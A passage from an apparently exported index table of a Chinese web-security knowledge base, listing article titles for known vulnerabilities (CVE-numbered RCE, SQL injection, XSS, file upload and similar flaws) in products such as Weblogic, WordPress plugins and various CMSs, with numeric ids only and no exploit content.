| 823  | Web安全 | Weblogic                       | {'id': 6024, 'name': '（CVE-2020-2555）Oracle Coherence\&Weblogic 反序列化远程代码执行漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6024, 'title': None}                                        |
| 824  | Web安全 | Weblogic                       | {'id': 6645, 'name': '（CVE-2020-2883）Weblogic 远程代码执行漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6645, 'title': None}                                                              |
| 825  | Web安全 | Weblogic                       | {'id': 7195, 'name': '（CVE-2020-14882）（CVE-2020-14883）Weblogic 远程代码执行漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7195, 'title': None}                                             |
| 826  | Web安全 | Webmin                         | {'id': 7334, 'name': '（CVE-2019-12840）Webmin 远程命令执行漏洞', 'pid': 138, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7334, 'title': None}                                                               |
| 827  | Web安全 | Webmin                         | {'id': 6025, 'name': '（CVE-2019-15107）Webmin 远程命令执行漏洞', 'pid': 138, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6025, 'title': None}                                                               |
| 828  | Web安全 | Webmin                         | {'id': 7388, 'name': '（CVE-2019-15642）Webmin 远程命令执行漏洞', 'pid': 138, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7388, 'title': None}                                                               |
| 829  | Web安全 | Webmin                         | {'id': 7333, 'name': '（CVE-2020-35606）Webmin 远程命令执行漏洞', 'pid': 138, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7333, 'title': None}                                                               |
| 830  | Web安全 | WebSocket                      | {'id': 7337, 'name': '深入理解跨站点 WebSocket 劫持漏洞的原理及防范', 'pid': 479, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7337, 'title': None}                                                                  |
| 831  | Web安全 | WebSocket                      | {'id': 7339, 'name': '（CVE-2020-15779）Socket.io-file 路径遍历漏洞', 'pid': 479, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7339, 'title': None}                                                         |
| 832  | Web安全 | WebSocket                      | {'id': 7338, 'name': '（CVE-2020-24807）绕过 Socket.io-file NPM 模块中的文件类型限制', 'pid': 479, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7338, 'title': None}                                              |
| 833  | Web安全 | Websphere                      | {'id': 7336, 'name': '（CVE-2020-4450）Websphere IIOP协议反序列化漏洞', 'pid': 480, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7336, 'title': None}                                                         |
| 834  | Web安全 | WeCenter                       | {'id': 6026, 'name': 'WeCenter 3.3.4 前台sql注入', 'pid': 139, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6026, 'title': None}                                                                        |
| 835  | Web安全 | WeCenter                       | {'id': 6027, 'name': 'WeCenter 3.3.4 任意文件删除', 'pid': 139, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6027, 'title': None}                                                                         |
| 836  | Web安全 | WeCenter                       | {'id': 6028, 'name': 'WeCenter 3.3.4 远程命令执行', 'pid': 139, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6028, 'title': None}                                                                         |
| 837  | Web安全 | WellCMS                        | {'id': 6029, 'name': 'WellCMS 1.1.02 任意用户密码重置漏洞', 'pid': 140, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6029, 'title': None}                                                                     |
| 838  | Web安全 | WellCMS                        | {'id': 6030, 'name': 'WellCMS 2.0 Beta3 后台任意文件上传', 'pid': 140, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6030, 'title': None}                                                                    |
| 839  | Web安全 | Wordpress                      | {'id': 7147, 'name': 'WordPress Plugin - Baidu xss漏洞 ', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7147, 'title': None}                                                               |
| 840  | Web安全 | Wordpress                      | {'id': 6031, 'name': 'WordPress Plugin - Google Review Slider 6.1 SQL Injection ', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6031, 'title': None}                                    |
| 841  | Web安全 | Wordpress                      | {'id': 6032, 'name': 'WordPress Plugin - NextGEN Gallery <= 3.2.2 RCE ', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6032, 'title': None}                                              |
| 842  | Web安全 | Wordpress                      | {'id': 6033, 'name': 'WordPress Plugin - Easy WP SMTP 反序列化漏洞 ', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6033, 'title': None}                                                       |
| 843  | Web安全 | Wordpress                      | {'id': 7303, 'name': 'WordPress Plugin - Easy WP SMTP v1.4.3 任意用户密码重置漏洞', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7303, 'title': None}                                             |
| 844  | Web安全 | Wordpress                      | {'id': 6034, 'name': 'WordPress Plugin - Quizlord 2.0 XSS ', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6034, 'title': None}                                                          |
| 845  | Web安全 | Wordpress                      | {'id': 6035, 'name': 'WordPress Plugin - AutoSuggest sql注入 ', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6035, 'title': None}                                                         |
| 846  | Web安全 | Wordpress                      | {'id': 6036, 'name': 'WordPress Plugin - Social Warfare<=3.5.2 RCE ', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6036, 'title': None}                                                 |
| 847  | Web安全 | Wordpress                      | {'id': 6037, 'name': 'WordPress Plugin - Search Meter 2.13.2 CSV Injection ', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6037, 'title': None}                                         |
| 848  | Web安全 | Wordpress                      | {'id': 7049, 'name': 'WordPress Plugin - WPdiscuz v7.0.4 任意文件上传漏洞', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7049, 'title': None}                                                   |
| 849  | Web安全 | Wordpress                      | {'id': 7123, 'name': 'WordPress Plugin - File Manager 任意文件上传漏洞', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7123, 'title': None}                                                      |
| 850  | Web安全 | Wordpress                      | {'id': 7148, 'name': 'WordPress Plugin - Real-Time Find and Replace xss漏洞', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7148, 'title': None}                                           |
| 851  | Web安全 | Wordpress                      | {'id': 6038, 'name': '（CVE-2018-19287）WordPress Plugin - Ninja Forms 3.3.17 XSS', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6038, 'title': None}                                     |
| 852  | Web安全 | Wordpress                      | {'id': 6039, 'name': '（CVE-2019-9978）WordPress Plugin - social warfare 远程命令执行漏洞 ', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6039, 'title': None}                                    |
| 853  | Web安全 | Wordpress                      | {'id': 6040, 'name': '（CVE- 2019-10866）WordPress Plugin - Form Maker 1.13.3 sql注入', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6040, 'title': None}                                   |
| 854  | Web安全 | Wordpress                      | {'id': 6041, 'name': '（CVE-2019-15866）WordPress Plugin - Crelly Slider 任意文件上传\&RCE漏洞', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6041, 'title': None}                                |
| 855  | Web安全 | Wordpress                      | {'id': 6042, 'name': '（CVE-2019-16520）WordPress Plugin - All in One SEO Pack 储存型xss', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6042, 'title': None}                                 |
| 856  | Web安全 | Wordpress                      | {'id': 6043, 'name': '（CVE-2019-16522）WordPress Plugin - EU Cookie Law (GDPR) 储存型xss', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6043, 'title': None}                                |
| 857  | Web安全 | Wordpress                      | {'id': 6044, 'name': '（CVE-2019-16523）WordPress Plugin - Events Manager 储存型xss', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6044, 'title': None}                                      |
| 858  | Web安全 | Wordpress                      | {'id': 6045, 'name': '（CVE-2019-19133）WordPress Plugin - CSS Hero 4.0.3 反射xss', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6045, 'title': None}                                       |
| 859  | Web安全 | Wordpress                      | {'id': 6046, 'name': '（CVE-2020-10385）WordPress Plugin - WPForms 1.5.9 储存型xss', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6046, 'title': None}                                       |
| 860  | Web安全 | Wordpress                      | {'id': 6615, 'name': '（CVE-2020-12462）WordPress Plugin - Ninja Forms CSRF to XSS', 'pid': 142, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6615, 'title': None}                                    |
| 861  | Web安全 | Wordpress                      | {'id': 6060, 'name': '（从xss到getshell） xss的深层次利用与探讨', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6060, 'title': None}                                                                  |
| 862  | Web安全 | Wordpress                      | {'id': 6047, 'name': '（CVE-2017-6514）WordPress 4.7.2 敏感信息泄漏', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6047, 'title': None}                                                         |
| 863  | Web安全 | Wordpress                      | {'id': 6048, 'name': 'Wordpress <= 4.7.4 XML-RPC API POST META 未校验漏洞', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6048, 'title': None}                                                |
| 864  | Web安全 | Wordpress                      | {'id': 6049, 'name': 'Wordpress <= 4.8.2 POST META 校验绕过漏洞', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6049, 'title': None}                                                           |
| 865  | Web安全 | Wordpress                      | {'id': 6050, 'name': '（CVE-2017-8295）WordPress <=4.8.3 任意密码重置/HOST头注入漏洞', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6050, 'title': None}                                             |
| 866  | Web安全 | Wordpress                      | {'id': 6051, 'name': '（CVE-2018-6389）WordPress <= 4.9.x 拒绝服务漏洞', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6051, 'title': None}                                                      |
| 867  | Web安全 | Wordpress                      | {'id': 6052, 'name': 'Wordpress <= 4.9.6 任意文件删除漏洞', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6052, 'title': None}                                                                   |
| 868  | Web安全 | Wordpress                      | {'id': 6053, 'name': '（CVE-2019-6977）WordPress 5.0 rce', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6053, 'title': None}                                                              |
| 869  | Web安全 | Wordpress                      | {'id': 6054, 'name': '（CVE-2019-8943）WordPress 5.0.3 - Crop-image Shell Upload (Metasploit)', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6054, 'title': None}                         |
| 870  | Web安全 | Wordpress                      | {'id': 6055, 'name': '（CVE-2019-16219）WordPress 5.2.3 内置编辑器Gutenberg 储存型xss', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6055, 'title': None}                                         |
| 871  | Web安全 | Wordpress                      | {'id': 6056, 'name': '（CVE-2019-17671）Wordpress <= 5.2.3未授权访问', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6056, 'title': None}                                                       |
| 872  | Web安全 | Wordpress                      | {'id': 6057, 'name': 'Wordpress 5.2.4 cors跨域劫持漏洞', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6057, 'title': None}                                                                    |
| 873  | Web安全 | Wordpress                      | {'id': 6058, 'name': 'WordPress <=5.3.0 xmlrpc.php 拒绝服务漏洞', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6058, 'title': None}                                                           |
| 874  | Web安全 | Wordpress                      | {'id': 6059, 'name': '（CVE-2019-16773）WordPress 5.3.0 储存型xss', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6059, 'title': None}                                                        |
| 875  | Web安全 | Wordpress                      | {'id': 6766, 'name': '（CVE-2020-4046）WordPress 5.3.4 储型XSS', 'pid': 143, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6766, 'title': None}                                                          |
| 876  | Web安全 | X5music                        | {'id': 6073, 'name': 'X5music 后台登陆绕过+后台getshell', 'pid': 146, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6073, 'title': None}                                                                     |
| 877  | Web安全 | XAMPP                          | {'id': 6061, 'name': '（CVE-2020-11107）XAMPP任意命令执行漏洞', 'pid': 144, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6061, 'title': None}                                                                 |
| 878  | Web安全 | XDCMS                          | {'id': 6062, 'name': 'XDCMS 1.0 sql注入漏洞（一）', 'pid': 145, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6062, 'title': None}                                                                          |
| 879  | Web安全 | XDCMS                          | {'id': 6063, 'name': 'XDCMS 1.0 sql注入漏洞（二）', 'pid': 145, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6063, 'title': None}                                                                          |
| 880  | Web安全 | XDCMS                          | {'id': 6064, 'name': 'XDCMS 1.0 csrf漏洞', 'pid': 145, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6064, 'title': None}                                                                              |
| 881  | Web安全 | XDCMS                          | {'id': 6065, 'name': 'XDCMS 1.0 xss漏洞', 'pid': 145, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6065, 'title': None}                                                                               |
| 882  | Web安全 | XDCMS                          | {'id': 6066, 'name': 'XDCMS 1.0 后台任意文件读取', 'pid': 145, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6066, 'title': None}                                                                            |
| 883  | Web安全 | XDCMS                          | {'id': 6067, 'name': 'XDCMS 1.0 任意文件包含漏洞', 'pid': 145, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6067, 'title': None}                                                                            |
| 884  | Web安全 | XDCMS                          | {'id': 6068, 'name': 'XDCMS 1.0 重装系统漏洞', 'pid': 145, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6068, 'title': None}                                                                              |
| 885  | Web安全 | XDCMS                          | {'id': 6069, 'name': 'XDCMS 1.0 后台配置文件getshell', 'pid': 145, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6069, 'title': None}                                                                      |
| 886  | Web安全 | XDCMS                          | {'id': 6070, 'name': 'XDCMS 3.0 后台登录窗sql注入漏洞', 'pid': 145, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6070, 'title': None}                                                                        |
| 887  | Web安全 | XDCMS                          | {'id': 6071, 'name': 'XDCMS 3.0 后台友情链接sql注入', 'pid': 145, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6071, 'title': None}                                                                         |
| 888  | Web安全 | XDCMS                          | {'id': 6072, 'name': 'XDCMS 3.0 数据库备份任意文件夹删除', 'pid': 145, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6072, 'title': None}                                                                        |
| 889  | Web安全 | XenMobile                      | {'id': 7248, 'name': '（CVE-2020-8209）XenMobile 控制台存在任意文件读取漏洞', 'pid': 447, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7248, 'title': None}                                                        |
| 890  | Web安全 | Xfilesharing                   | {'id': 6074, 'name': '（CVE-2019-18951）Xfilesharing 2.5.1本地文件上传getshell', 'pid': 147, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6074, 'title': None}                                              |
| 891  | Web安全 | Xfilesharing                   | {'id': 6075, 'name': '（CVE-2019-18952）Xfilesharing 2.5.1本地文件包含', 'pid': 147, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6075, 'title': None}                                                      |
| 892  | Web安全 | XStream                        | {'id': 6076, 'name': '（CVE-2019-10173）Xstream 远程代码执行漏洞', 'pid': 148, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6076, 'title': None}                                                              |
| 893  | Web安全 | XStream                        | {'id': 7246, 'name': '（CVE-2020-26217）XStream 远程代码执行漏洞', 'pid': 148, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7246, 'title': None}                                                              |
| 894  | Web安全 | XStream                        | {'id': 7379, 'name': '（CVE-2020-26258）XStream ssrf漏洞', 'pid': 148, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7379, 'title': None}                                                                |
| 895  | Web安全 | XStream                        | {'id': 7378, 'name': '（CVE-2020-26259）XStream 任意文件删除漏洞', 'pid': 148, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7378, 'title': None}                                                              |
| 896  | Web安全 | XXL-JOB                        | {'id': 7153, 'name': 'XXL-JOB 任务调度中心 反弹shell', 'pid': 419, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7153, 'title': None}                                                                        |
| 897  | Web安全 | XXL-JOB                        | {'id': 7196, 'name': 'XXL-JOB RESTful API 未授权访问导致的远程命令执行漏洞', 'pid': 419, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7196, 'title': None}                                                          |
| 898  | Web安全 | XXL-JOB                        | {'id': 7210, 'name': 'XXL-JOB RESTful API 未授权访问Hessian2反序列化漏洞', 'pid': 419, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7210, 'title': None}                                                       |
| 899  | Web安全 | XYHCMS                         | {'id': 7012, 'name': 'XYHCMS v3.2 后台任意文件删除漏洞', 'pid': 149, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7012, 'title': None}                                                                        |
| 900  | Web安全 | XYHCMS                         | {'id': 7013, 'name': 'XYHCMS v3.2 后台任意文件下载', 'pid': 149, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7013, 'title': None}                                                                          |
| 901  | Web安全 | XYHCMS                         | {'id': 7008, 'name': 'XYHCMS v3.5 后台任意文件读取', 'pid': 149, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7008, 'title': None}                                                                          |
| 902  | Web安全 | XYHCMS                         | {'id': 6077, 'name': 'XYHCMS 3.6 后台代码执行漏洞（一）', 'pid': 149, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6077, 'title': None}                                                                        |
| 903  | Web安全 | XYHCMS                         | {'id': 7009, 'name': 'XYHCMS v3.6 后台代码执行漏洞（二）', 'pid': 149, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7009, 'title': None}                                                                       |
| 904  | Web安全 | XYHCMS                         | {'id': 7079, 'name': 'XYHCMS v3.6 后台代码执行漏洞（三）', 'pid': 149, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7079, 'title': None}                                                                       |
| 905  | Web安全 | XYHCMS                         | {'id': 7010, 'name': 'XYHCMS v3.6 后台文件上传getshell（一）', 'pid': 149, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7010, 'title': None}                                                                 |
| 906  | Web安全 | XYHCMS                         | {'id': 7011, 'name': 'XYHCMS v3.6 后台文件上传getshell（二）仅限Windows', 'pid': 149, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7011, 'title': None}                                                        |
| 907  | Web安全 | YCCMS                          | {'id': 6620, 'name': 'YCCMS 3.4 反射型xss', 'pid': 283, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6620, 'title': None}                                                                              |
| 908  | Web安全 | YCCMS                          | {'id': 6617, 'name': 'YCCMS 3.4 任意文件删除', 'pid': 283, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6617, 'title': None}                                                                              |
| 909  | Web安全 | YCCMS                          | {'id': 6616, 'name': 'YCCMS 3.4 未授权更改管理员账号密码', 'pid': 283, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6616, 'title': None}                                                                        |
| 910  | Web安全 | YCCMS                          | {'id': 6618, 'name': 'YCCMS 3.4 任意文件上传漏洞（一）', 'pid': 283, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6618, 'title': None}                                                                         |
| 911  | Web安全 | YCCMS                          | {'id': 6619, 'name': 'YCCMS 3.4 任意文件上传漏洞（二）', 'pid': 283, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6619, 'title': None}                                                                         |
| 912  | Web安全 | Yii2                           | {'id': 7122, 'name': '（CVE-2020-15148）Yii2框架反序列化漏洞', 'pid': 405, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7122, 'title': None}                                                                  |
| 913  | Web安全 | YouDianCMS                     | {'id': 6078, 'name': 'YouDianCMS v8.0 Storeage XSS', 'pid': 150, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6078, 'title': None}                                                                  |
| 914  | Web安全 | YouDianCMS                     | {'id': 6079, 'name': 'YouDianCMS v8.0 sql注入漏洞', 'pid': 150, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6079, 'title': None}                                                                       |
| 915  | Web安全 | YouDianCMS                     | {'id': 7360, 'name': 'YouDianCMS v9.1 前台sql注入漏洞', 'pid': 150, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7360, 'title': None}                                                                     |
| 916  | Web安全 | Yunucms                        | {'id': 6080, 'name': 'Yunucms v2.0.7 后台xss', 'pid': 151, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6080, 'title': None}                                                                          |
| 917  | Web安全 | Yunucms                        | {'id': 6081, 'name': 'Yunucms v2.0.7 数据库泄露', 'pid': 151, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6081, 'title': None}                                                                          |
| 918  | Web安全 | Yunyecms                       | {'id': 6082, 'name': 'Yunyecms v2.0.2 前台注入漏洞（一）', 'pid': 152, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6082, 'title': None}                                                                     |
| 919  | Web安全 | Yunyecms                       | {'id': 6083, 'name': 'Yunyecms v2.0.2 前台注入漏洞（二）', 'pid': 152, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6083, 'title': None}                                                                     |
| 920  | Web安全 | Yunyecms                       | {'id': 6084, 'name': 'Yunyecms v2.0.2 后台注入漏洞（一）', 'pid': 152, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6084, 'title': None}                                                                     |
| 921  | Web安全 | Yunyecms                       | {'id': 6085, 'name': 'Yunyecms v2.0.2 后台注入漏洞（二）', 'pid': 152, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6085, 'title': None}                                                                     |
| 922  | Web安全 | YXcms                          | {'id': 6087, 'name': 'YXcmsApp 1.4.3任意用户密码重置漏洞', 'pid': 154, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6087, 'title': None}                                                                      |
| 923  | Web安全 | YXcms                          | {'id': 6088, 'name': 'YXCMS 1.4.7储存型xss', 'pid': 154, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6088, 'title': None}                                                                             |
| 924  | Web安全 | YXcms                          | {'id': 6089, 'name': 'YXCMS 1.4.7任意文件删除', 'pid': 154, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6089, 'title': None}                                                                             |
| 925  | Web安全 | YXcms                          | {'id': 6090, 'name': 'YXCMS 1.4.7任意文件写入', 'pid': 154, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6090, 'title': None}                                                                             |
| 926  | Web安全 | YXcms                          | {'id': 6091, 'name': 'YXCMS 1.4.7SQL注入', 'pid': 154, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6091, 'title': None}                                                                              |
| 927  | Web安全 | YXcms                          | {'id': 6092, 'name': '（CVE-2018-11003）YXcms 1.4.7跨站请求伪造漏洞', 'pid': 154, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6092, 'title': None}                                                           |
| 928  | Web安全 | YzmCMS                         | {'id': 6093, 'name': 'YzmCMS v3.6 csrf', 'pid': 155, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6093, 'title': None}                                                                              |
| 929  | Web安全 | YzmCMS                         | {'id': 6094, 'name': 'YzmCMS v3.6 远程命令执行', 'pid': 155, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6094, 'title': None}                                                                            |
| 930  | Web安全 | YzmCMS                         | {'id': 6095, 'name': '（CVE-2018-7653）YzmCMS v3.6 xss漏洞', 'pid': 155, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6095, 'title': None}                                                              |
| 931  | Web安全 | YzmCMS                         | {'id': 6096, 'name': '（CVE-2018-8756）YzmCMS v3.7.1 Eval注入漏洞', 'pid': 155, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6096, 'title': None}                                                         |
| 932  | Web安全 | YzmCMS                         | {'id': 6097, 'name': '（CVE-2018-19092）YzmCMS v5.2 xss漏洞', 'pid': 155, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6097, 'title': None}                                                             |
| 933  | Web安全 | YzmCMS                         | {'id': 6098, 'name': 'YzmCMS v5.3 后台ssrf ', 'pid': 155, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6098, 'title': None}                                                                           |
| 934  | Web安全 | YzmCMS                         | {'id': 6099, 'name': 'YzmCMS v5.4 后台getshell（一） ', 'pid': 155, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6099, 'title': None}                                                                    |
| 935  | Web安全 | YzmCMS                         | {'id': 6100, 'name': 'YzmCMS v5.4 后台getshell（二）', 'pid': 155, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6100, 'title': None}                                                                     |
| 936  | Web安全 | YzmCMS                         | {'id': 7285, 'name': '（CVE-2020-22394）YzmCMS v5.5 储存型xss漏洞', 'pid': 155, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7285, 'title': None}                                                          |
| 937  | Web安全 | YzmCMS                         | {'id': 6841, 'name': 'YzmCMS v5.7 用户模块时间盲注', 'pid': 155, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6841, 'title': None}                                                                          |
| 938  | Web安全 | Zabbix                         | {'id': 6979, 'name': '（CVE-2016-10134）Zabbix latest.php sql注入漏洞', 'pid': 372, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6979, 'title': None}                                                     |
| 939  | Web安全 | Zimbra                         | {'id': 6101, 'name': '（CVE-2019-9621）（CVE-2019-9670）Zimbra 远程代码执行漏洞', 'pid': 156, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6101, 'title': None}                                                 |
| 940  | Web安全 | Zzcms                          | {'id': 6102, 'name': 'Zzcms v2018 重装getshell', 'pid': 157, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6102, 'title': None}                                                                        |
| 941  | Web安全 | Zzcms                          | {'id': 6103, 'name': 'Zzcms v8.2 任意用户密码修改', 'pid': 157, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6103, 'title': None}                                                                           |
| 942  | Web安全 | Zzcms                          | {'id': 6104, 'name': '（CVE-2018-13056）Zzcms v8.3 任意文件删除', 'pid': 157, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6104, 'title': None}                                                             |
| 943  | Web安全 | Zzcms                          | {'id': 6105, 'name': '（CVE-2018-14961）Zzcms v8.3 前台sql注入', 'pid': 157, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6105, 'title': None}                                                            |
| 944  | Web安全 | Zzcms                          | {'id': 6106, 'name': '（CVE-2018-14962）Zzcms v8.3 储存型xss', 'pid': 157, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6106, 'title': None}                                                             |
| 945  | Web安全 | Zzcms                          | {'id': 6107, 'name': '（CVE-2018-14963）Zzcms v8.3 csrf', 'pid': 157, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6107, 'title': None}                                                               |
| 946  | Web安全 | ZOHO ManageEngine              | {'id': 7395, 'name': '（CVE-2019-8394）ZOHO ManageEngine ServiceDesk Plus 任意文件上传漏洞', 'pid': 498, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7395, 'title': None}                                    |
| 947  | Web安全 | Zookeeper                      | {'id': 7272, 'name': 'Zookeeper 未授权访问漏洞', 'pid': 456, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7272, 'title': None}                                                                             |
| 948  | Web安全 | Zzzcms                         | {'id': 6108, 'name': 'Zzzcms v1.61 后台远程命令执行漏洞', 'pid': 158, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6108, 'title': None}                                                                       |
| 949  | Web安全 | Zzzcms                         | {'id': 6109, 'name': 'Zzzcms v1.75 后台爆破+验证码问题', 'pid': 158, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6109, 'title': None}                                                                       |
| 950  | Web安全 | Zzzcms                         | {'id': 7400, 'name': 'Zzzcms < v1.72 后台sql注入漏洞', 'pid': 158, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7400, 'title': None}                                                                      |
| 951  | Web安全 | Zzzcms                         | {'id': 6110, 'name': 'Zzzcms v1.75 xss漏洞', 'pid': 158, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6110, 'title': None}                                                                            |
| 952  | Web安全 | Zzzcms                         | {'id': 7401, 'name': 'Zzzcms < v1.72 前台sql注入漏洞', 'pid': 158, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7401, 'title': None}                                                                      |
| 953  | Web安全 | Zzzcms                         | {'id': 6111, 'name': 'Zzzcms v1.75 ssrf', 'pid': 158, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6111, 'title': None}                                                                             |
| 954  | Web安全 | Zzzcms                         | {'id': 6112, 'name': 'Zzzcms v1.75 前台sql注入', 'pid': 158, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6112, 'title': None}                                                                          |
